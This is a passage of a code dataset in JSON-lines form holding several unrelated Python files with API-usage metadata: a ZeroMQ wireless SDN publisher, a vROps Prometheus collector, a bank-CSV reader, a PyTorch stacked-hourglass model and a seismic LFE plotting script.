"attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pdb.set_trace", "line_number": 23, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfTransformer", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pdb.set_trace", "line_number": 64, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 91, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}]}
+{"seq_id": "580784165", "text": "#writing script for publisher wireless\nimport pyangbind\nimport zmq\nimport socket\nfrom socket import *\nimport time\nimport threading\nimport json\nimport wirel_to_orc\nimport jsonpickle\nfrom threading import Thread\nimport os\nimport re\nimport wirel_to_orc\nimport pyangbind.lib.pybindJSON as pybindJSON\n\nsw= wirel_to_orc.wirel_to_orc()\n\nob= sw.ControllerMac.clients.add(\"01:23:45:67:89:ab\")\nob.ip=\"192.168.1.1\"\nob.throughput=\"3.1\"\nob.Signal=\"3.14\"\n\ndef get_ip_data(ether_adapter):\n ip_data = os.popen(\"ifconfig \" + ether_adapter)\n for line in ip_data:\n match2 = re.search(r'inet\\s+(\\d+.\\d+.\\d+.\\d+)', line)\n if match2:\n ip_ = match2.group(1)\n\n return ip_\n\ndef get_bd_address(ether_adapter):\n ip_data = os.popen(\"ifconfig \" + ether_adapter)\n for line in ip_data:\n match2 = re.search(r'broadcast\\s+(\\d+.\\d+.\\d+.\\d+)', line)\n if match2:\n bcast = match2.group(1)\n return bcast\n\n#Send Broadcast\ndef bd_send(Host,port):\n sock=socket(AF_INET,SOCK_DGRAM)\n msg='hello'\n sock.setsockopt(SOL_SOCKET,SO_BROADCAST,1)\n sock.sendto(msg.encode(),(Host,port))\n\n#This is for publishing to the controller\ndef publish():\n sw=wirel_to_orc.wirel_to_orc()\n ob= sw.ControllerMac.clients.add(\"01:23:45:67:89:ab\")\n ob.ip=\"192.168.1.27\"\n ob.throughput=\"1.1\"\n ob.Signal=\"1.4\"\n a=sw.get()\n\n packet = (pybindJSON.dumps(sw))\n context=zmq.Context()\n socket=context.socket(zmq.PUB)\n socket.bind(\"tcp://*:6782\")\n for data in range(2):\n socket.send_string('wireless: %s' % packet,encoding=\"Utf-8\")\n time.sleep(1)\n socket.close()\ndef rep(host,port):\n context=zmq.Context()\n socket=context.socket(zmq.REP)\n socket.bind('tcp://' '%s:%d' %(host,port))\n message=socket.recv_json(1024)\n print(message)\n\nif __name__==\"__main__\":\n ethernet_card = \"wlp1s0\"\n bd_of_the_machine = get_bd_address(ethernet_card)\n ip_of_the_machine = get_ip_data(ethernet_card)\n\n t1 = threading.Thread(target=bd_send, name=\"Broadcast_send\", args=(bd_of_the_machine, 5694))\n t1.start()\n threads=threading.Thread(target=publish)\n threads.start()\n t2=threading.Thread(target=rep,args=(ip_of_the_machine,9843))\n t2.start()", "sub_path": "Wireless_SDN.py", "file_name": "Wireless_SDN.py", "file_ext": "py", "file_size_in_byte": 2233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "wirel_to_orc.wirel_to_orc", "line_number": 17, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 25, "usage_type": "call"}, {"api_name": "re.search", "line_number": 27, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 34, "usage_type": "call"}, {"api_name": "re.search", "line_number": 36, "usage_type": "call"}, {"api_name": "wirel_to_orc.wirel_to_orc", "line_number": 50, "usage_type": "call"}, {"api_name": "pyangbind.lib.pybindJSON.dumps", "line_number": 57, "usage_type": "call"}, {"api_name": "pyangbind.lib.pybindJSON", "line_number": 57, "usage_type": "name"}, {"api_name": "zmq.Context", "line_number": 58, "usage_type": "call"}, {"api_name": "zmq.PUB", "line_number": 59, "usage_type": "attribute"}, {"api_name": "socket.bind", "line_number": 60, "usage_type": "call"}, {"api_name": "socket.send_string", "line_number": 62, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}, {"api_name": "socket.close", "line_number": 64, "usage_type": "call"}, {"api_name": "zmq.Context", "line_number": 66, "usage_type": "call"}, {"api_name": "zmq.REP", "line_number": 67, "usage_type": "attribute"}, {"api_name": "socket.bind", "line_number": 68, "usage_type": "call"}, {"api_name": "socket.recv_json", "line_number": 69, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 77, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 79, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 81, "usage_type": "call"}]}
+{"seq_id": "305680489", "text": "from BaseCollector import BaseCollector\nimport os, time\nfrom prometheus_client.core import GaugeMetricFamily\nfrom tools.Resources import Resources\nfrom tools.YamlRead import YamlRead\n\n\nclass DatastoreStatsCollector(BaseCollector):\n def __init__(self):\n self.wait_for_inventory_data()\n self.statkey_yaml = YamlRead('collectors/statkey.yaml').run()\n # self.post_registered_collector(self.__class__.__name__, self.g.name)\n\n def describe(self):\n yield GaugeMetricFamily('vrops_datastore_stats', 'testtext')\n\n def collect(self):\n g = GaugeMetricFamily('vrops_datastore_stats', 'testtext', labels=['datacenter', 'vccluster', 'hostsystem', 'datastore', 'statkey'])\n if os.environ['DEBUG'] >= '1':\n print(self.__class__.__name__ + \" starts with collecting the metrics\")\n\n #make one big request per stat id with all resource id's in its belly\n for target in self.get_datastores_by_target():\n token = self.get_target_tokens()\n token = token[target]\n if not token:\n print(\"skipping \" + target + \" in \" + self.__class__.__name__ + \" , no token\")\n\n uuids = self.target_datastores[target]\n for statkey_pair in self.statkey_yaml[self.__class__.__name__]:\n statkey_label = statkey_pair['label']\n statkey = statkey_pair['statkey']\n values = Resources.get_latest_stat_multiple(target, token, uuids, statkey)\n if not values:\n print(\"skipping statkey \" + str(statkey) + \" in \" + self.__class__.__name__ + \" , no return\")\n continue\n for value_entry in values:\n #there is just one, because we are querying latest only\n metric_value = value_entry['stat-list']['stat'][0]['data'][0]\n datastore_id = value_entry['resourceId']\n g.add_metric(labels=[self.datastores[datastore_id]['datacenter'],\n self.datastores[datastore_id]['cluster'],\n self.datastores[datastore_id]['parent_host_name'],\n self.datastores[datastore_id]['name'],\n statkey_label], value=metric_value)\n # self.post_metrics(self.g.name)\n yield g\n", "sub_path": "collectors/DatastoreStatsCollector.py", "file_name": "DatastoreStatsCollector.py", "file_ext": "py", "file_size_in_byte": 2376, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "BaseCollector.BaseCollector", "line_number": 8, "usage_type": "name"}, {"api_name": "tools.YamlRead.YamlRead", "line_number": 11, "usage_type": "call"}, {"api_name": "prometheus_client.core.GaugeMetricFamily", "line_number": 15, "usage_type": "call"}, {"api_name": "prometheus_client.core.GaugeMetricFamily", "line_number": 18, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tools.Resources.Resources.get_latest_stat_multiple", "line_number": 33, "usage_type": "call"}, {"api_name": "tools.Resources.Resources", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "9263282", "text": "import csv\nimport logging\nfrom datetime import datetime\n\nfrom app_code.banktransactions.BankTransaction import BankTransaction\nfrom app_code.banktransactions.BankTransactionDataStore import BankTransactionDataStore\n\n\nclass BankTransactions(object):\n\n def is_date(self, dateStr):\n try:\n datetime.strptime(dateStr, '%d-%m-%Y')\n return True\n except ValueError:\n return False\n\n def read(self, filename):\n logger = logging.getLogger(\"BankTransactions\")\n logger.info(\"Load file: \" + filename)\n row_counter = 0\n storage = BankTransactionDataStore()\n with open(filename, 'rb') as csvfile:\n rowreader = csv.reader(csvfile, delimiter=';', quotechar='\"',)\n for row in rowreader:\n bt = BankTransaction()\n if ((len(row) >= 9) and self.is_date(row[0])):\n bt.valutaDatum = row[0]\n bt.reference = row[1]\n bt.type = row[2].decode(\"latin_1\")\n bt.amount = row[3]\n bt.currency = row[4]\n bt.date = row[5]\n bt.sourceAccount = row[6]\n bt.name = row[7]\n bt.message1 = row[8]\n bt.message2 = row[9]\n storage.save_bank_transaction(bt)\n row_counter += 1\n else:\n logger.warn(\"Invalid line (header?)\")\n logger.info(\"Loaded %s transactions\", row_counter)\n\n", "sub_path": "core/app_code/banktransactions/BankTransactions.py", "file_name": "BankTransactions.py", "file_ext": "py", "file_size_in_byte": 1534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "app_code.banktransactions.BankTransactionDataStore.BankTransactionDataStore", "line_number": 22, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 24, "usage_type": "call"}, {"api_name": "app_code.banktransactions.BankTransaction.BankTransaction", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "143282080", "text": "import moai.networks.lightning as minet\nimport moai.nn.convolution as mic\nimport moai.nn.residual as mires\nimport moai.nn.sampling.spatial.downsample as mids\nimport moai.modules.lightning as mimod\nimport moai.nn.utils as miu\n\nimport torch\n\nimport hydra.utils as hyu\nimport omegaconf.omegaconf as omegaconf\nimport typing\nimport logging\n\nlog = logging.getLogger(__name__)\n\n#NOTE: from https://github.com/anibali/pytorch-stacked-hourglass/blob/master/src/stacked_hourglass/model.py\n#NOTE: from https://github.com/princeton-vl/pytorch_stacked_hourglass/blob/master/models/posenet.py\n\n__all__ = [\"StackedHourglass\"]\n\nclass StackedHourglass(minet.FeedForward):\n def __init__(self,\n configuration: omegaconf.DictConfig,\n modules: omegaconf.DictConfig,\n data: omegaconf.DictConfig=None,\n parameters: omegaconf.DictConfig=None,\n feedforward: omegaconf.DictConfig=None,\n monads: omegaconf.DictConfig=None,\n supervision: omegaconf.DictConfig=None,\n validation: omegaconf.DictConfig=None,\n visualization: omegaconf.DictConfig=None,\n export: omegaconf.DictConfig=None,\n ):\n super(StackedHourglass, self).__init__(\n data=data, parameters=parameters,\n feedforward=feedforward, monads=monads,\n supervision=supervision, validation=validation,\n export=export, visualization=visualization, \n ) \n self.stacks = configuration.stacks\n preproc = configuration.preproc\n projection = configuration.projection\n prediction = configuration.prediction\n merge = configuration.merge\n hourglass = modules['hourglass']\n self.pre = torch.nn.Sequential(\n mic.make_conv_block(\n block_type=preproc.block,\n convolution_type=preproc.convolution,\n in_features=configuration.in_features, \n out_features=hourglass.features // 4,\n activation_type=preproc.activation,\n convolution_params={\n \"kernel_size\": preproc.stem.kernel_size,\n \"stride\": preproc.stem.stride,\n \"padding\": preproc.stem.padding,\n },\n ),\n mires.make_residual_block(\n block_type=preproc.residual,\n convolution_type=preproc.convolution,\n in_features=hourglass.features // 4,\n out_features=hourglass.features // 2,\n bottleneck_features=hourglass.features // 2,\n activation_type=preproc.activation,\n strided=False,\n ),\n mids.make_downsample(\n downscale_type=preproc.downscale,\n features=hourglass.features // 2,\n kernel_size=3 if preproc.downscale == 'maxpool2d_aa' else 2,\n ),\n mires.make_residual_block(\n block_type=preproc.residual,\n convolution_type=preproc.convolution,\n in_features=hourglass.features // 2,\n out_features=hourglass.features // 2,\n bottleneck_features=hourglass.features // 2,\n activation_type=preproc.activation,\n strided=False,\n ),\n mires.make_residual_block(\n block_type=preproc.residual,\n convolution_type=preproc.convolution,\n in_features=hourglass.features // 2,\n out_features=hourglass.features,\n bottleneck_features=hourglass.features,\n activation_type=preproc.activation,\n strided=False,\n ),\n )\n \n self.hgs = torch.nn.ModuleList([\n torch.nn.Sequential(\n hyu.instantiate(hourglass)\n ) for i in range(self.stacks)\n ] \n )\n \n self.features = torch.nn.ModuleList([\n torch.nn.Sequential(\n mires.make_residual_block(\n block_type=preproc.residual,\n convolution_type=preproc.convolution,\n in_features=hourglass.features,\n out_features=hourglass.features,\n bottleneck_features=hourglass.features,\n activation_type=preproc.activation,\n strided=False,\n ),\n mic.make_conv_block(\n block_type=projection.block,\n convolution_type=projection.convolution,\n in_features=hourglass.features, \n out_features=hourglass.features,\n activation_type=projection.activation,\n convolution_params={\"kernel_size\": 1, \"padding\": 0},\n )\n ) for i in range(self.stacks)\n ]\n )\n \n self.outs = torch.nn.ModuleList([\n mic.make_conv_block(\n block_type=prediction.block,\n convolution_type=prediction.convolution,\n in_features=hourglass.features, \n out_features=configuration.out_features,\n activation_type=prediction.activation,\n convolution_params={\n \"kernel_size\": 1, \"padding\": 0, \n },\n activation_params={\"inplace\": True} \n ) for i in range(self.stacks) \n ])\n self.merge_features = torch.nn.ModuleList([\n torch.nn.Sequential(\n mic.make_conv_1x1(\n convolution_type=projection.convolution,\n in_channels=hourglass.features,\n out_channels=hourglass.features\n ),\n torch.nn.Dropout2d(p=merge.dropout, inplace=True)\\\n if merge.dropout > 0.0 else torch.nn.Identity()\n ) for i in range(self.stacks-1)\n ])\n self.merge_preds = torch.nn.ModuleList([\n torch.nn.Sequential(\n mic.make_conv_1x1(\n convolution_type=projection.convolution,\n in_channels=configuration.out_features,\n out_channels=hourglass.features\n ),\n torch.nn.Dropout2d(p=prediction.dropout, inplace=False)\\\n if prediction.dropout > 0.0 else torch.nn.Identity()\n ) for i in range(self.stacks-1)\n ])\n self.input = configuration.input\n self.output_prefix = configuration.output\n\n def forward(self, \n td: typing.Dict[str, torch.Tensor]\n ) -> typing.Dict[str, torch.Tensor]: \n img = td[self.input]\n x = self.pre(img)\n combined_hm_preds = []\n for i in range(self.stacks):\n hg = self.hgs[i](x)\n feature = self.features[i](hg)\n preds = self.outs[i](feature)\n combined_hm_preds.append(preds)\n if i < self.stacks - 1: \n x = x + self.merge_preds[i](preds) + self.merge_features[i](feature)\n for i, heatmap in enumerate(combined_hm_preds):\n td[f\"{self.output_prefix}_{i+1}\"] = heatmap\n return td\n\n ", "sub_path": "moai/networks/lightning/factory/stacked_hourglass.py", "file_name": "stacked_hourglass.py", "file_ext": "py", "file_size_in_byte": 7335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "moai.networks.lightning.FeedForward", "line_number": 22, "usage_type": "attribute"}, {"api_name": "moai.networks.lightning", "line_number": 22, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 24, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 24, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 25, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 25, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 26, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 26, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 27, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 27, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 28, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 28, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 29, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 29, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 30, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 30, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 31, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 31, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 32, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 32, "usage_type": "name"}, {"api_name": "omegaconf.omegaconf.DictConfig", "line_number": 33, "usage_type": "attribute"}, {"api_name": "omegaconf.omegaconf", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "moai.nn.convolution.make_conv_block", "line_number": 48, "usage_type": "call"}, {"api_name": "moai.nn.convolution", "line_number": 48, "usage_type": "name"}, {"api_name": "moai.nn.residual.make_residual_block", "line_number": 60, "usage_type": "call"}, {"api_name": "moai.nn.residual", "line_number": 60, "usage_type": "name"}, {"api_name": "moai.nn.sampling.spatial.downsample.make_downsample", "line_number": 69, "usage_type": "call"}, {"api_name": "moai.nn.sampling.spatial.downsample", "line_number": 69, "usage_type": "name"}, {"api_name": "moai.nn.residual.make_residual_block", "line_number": 74, "usage_type": "call"}, {"api_name": "moai.nn.residual", "line_number": 74, "usage_type": "name"}, {"api_name": "moai.nn.residual.make_residual_block", "line_number": 83, "usage_type": "call"}, {"api_name": "moai.nn.residual", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "attribute"}, {"api_name": "hydra.utils.instantiate", "line_number": 96, "usage_type": "call"}, {"api_name": "hydra.utils", "line_number": 96, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "attribute"}, {"api_name": "moai.nn.residual.make_residual_block", "line_number": 103, "usage_type": "call"}, {"api_name": "moai.nn.residual", "line_number": 103, "usage_type": "name"}, {"api_name": "moai.nn.convolution.make_conv_block", "line_number": 112, "usage_type": "call"}, {"api_name": "moai.nn.convolution", "line_number": 112, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "attribute"}, {"api_name": "moai.nn.convolution.make_conv_block", "line_number": 125, "usage_type": "call"}, {"api_name": "moai.nn.convolution", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 138, "usage_type": "attribute"}, {"api_name": "moai.nn.convolution.make_conv_1x1", "line_number": 139, "usage_type": "call"}, {"api_name": "moai.nn.convolution", "line_number": 139, "usage_type": "name"}, {"api_name": "torch.nn.Dropout2d", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "attribute"}, {"api_name": "torch.nn.Identity", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 145, "usage_type": "attribute"}, {"api_name": "torch.nn.ModuleList", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 149, "usage_type": "attribute"}, {"api_name": "moai.nn.convolution.make_conv_1x1", "line_number": 150, "usage_type": "call"}, {"api_name": "moai.nn.convolution", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.nn.Dropout2d", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.nn.Identity", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 163, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 163, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 164, "usage_type": "attribute"}]}
+{"seq_id": "563216231", "text": "import matplotlib.pylab as pylab\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pickle\n\nfrom datetime import datetime, timedelta\nfrom math import floor\n\ndef get_time_series(df, window, tbegin, tend):\n \"\"\"\n Function to transform the LFE catalog into a time series\n\n Input:\n type df = panda DataFrame\n df = Times of LFE detections\n type window = float\n window = Duration of the time window where we count the number of LFEs\n (in seconds)\n type tbegin = obspy UTCDateTime\n tbegin = Beginning time of the catalog \n type tend = obspy UTCDateTime\n tend = End time of the catalog\n Output:\n type X = numpy array\n X = Time series with number of LFEs per time window\n \"\"\"\n # Length of the time series\n dt = tend - tbegin\n duration = dt.days * 86400.0 + dt.seconds + dt.microseconds * 0.000001\n nw = int(duration / window)\n X = np.zeros(nw, dtype=int)\n # Loop on LFEs\n for j in range(0, len(df)):\n myYear = df['year'].iloc[j]\n myMonth = df['month'].iloc[j]\n myDay = df['day'].iloc[j]\n myHour = df['hour'].iloc[j]\n myMinute = df['minute'].iloc[j]\n mySecond = int(floor(df['second'].iloc[j]))\n myMicrosecond = int(1000000.0 * (df['second'].iloc[j] - mySecond))\n t = datetime(myYear, myMonth, myDay, myHour, myMinute, mySecond, \\\n myMicrosecond)\n # Add LFE to appropriate time window\n if ((tbegin <= t) and (t < tbegin + timedelta(seconds=nw * window))):\n dt = t - tbegin\n duration = dt.days * 86400.0 + dt.seconds + dt.microseconds * \\\n 0.000001\n index = int(duration / window)\n X[index] = X[index] + 1 \n return X\n\n# Plot figure\nplt.figure(1, figsize=(10, 10))\nparams = {'xtick.labelsize':16,\n 'ytick.labelsize':16}\npylab.rcParams.update(params)\nwindow = 86400.0\npath = '/Users/ariane/Documents/ResearchProject/ETSscripts/catalog/'\n\n# Family 080421.14.048\ntbegin = datetime(2007, 7, 23, 0, 0, 0)\ntend = datetime(2009, 6, 13, 0, 0, 0)\nthreshold = 0.08\n\n# With FAME data\nax1 = plt.subplot(211)\ndf = pickle.load(open(path + 'LFEs_unknown/080421.14.048/catalog_200707-200912.pkl', 'rb'))\ndf = df.loc[df['cc'] >= threshold]\nX = get_time_series(df, window, tbegin, tend)\nplt.stem(np.arange(0, len(X)), X, 'k-', markerfmt=' ', basefmt=' ')\nplt.xlim([-0.5, len(X) - 0.5])\nplt.ylabel('Number of LFEs', fontsize=24)\nplt.title('Family 080421.14.048', fontsize=24)\nplt.figtext(0.7, 0.8, '{:d} LFEs'.format(np.sum(X)), fontsize=16)\nplt.figtext(0.7, 0.75, '(FAME)', fontsize=16)\n\n# With permanent stations\nax2 = plt.subplot(212)\ndf = pickle.load(open(path + 'LFEs_permanent/080421.14.048/catalog_200707-200912.pkl', 'rb'))\ndf = df.loc[df['cc'] >= threshold]\nX = get_time_series(df, window, tbegin, tend)\nplt.stem(np.arange(0, len(X)), X, 'k-', markerfmt=' ', basefmt=' ')\nplt.xlim([-0.5, len(X) - 0.5])\nplt.xlabel('Time (days) since 2007/07/23', fontsize=24)\nplt.ylabel('Number of LFEs', fontsize=24)\nplt.figtext(0.7, 0.4, '{:d} LFEs'.format(np.sum(X)), fontsize=16)\nplt.figtext(0.6, 0.35, '(permanent networks)', fontsize=16)\n\nplt.savefig('08042114048_permanent.eps', format='eps')\nax1.clear()\nax2.clear()\nplt.close(1)\n", "sub_path": "figures/catalog_SC/08042114048_permanent.py", "file_name": "08042114048_permanent.py", "file_ext": "py", "file_size_in_byte": 3301, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pylab.rcParams.update", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pylab.rcParams", "line_number": 57, "usage_type": "attribute"}, {"api_name": "matplotlib.pylab", "line_number": 57, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.stem", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figtext", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figtext", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.stem", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figtext", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figtext", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}]}
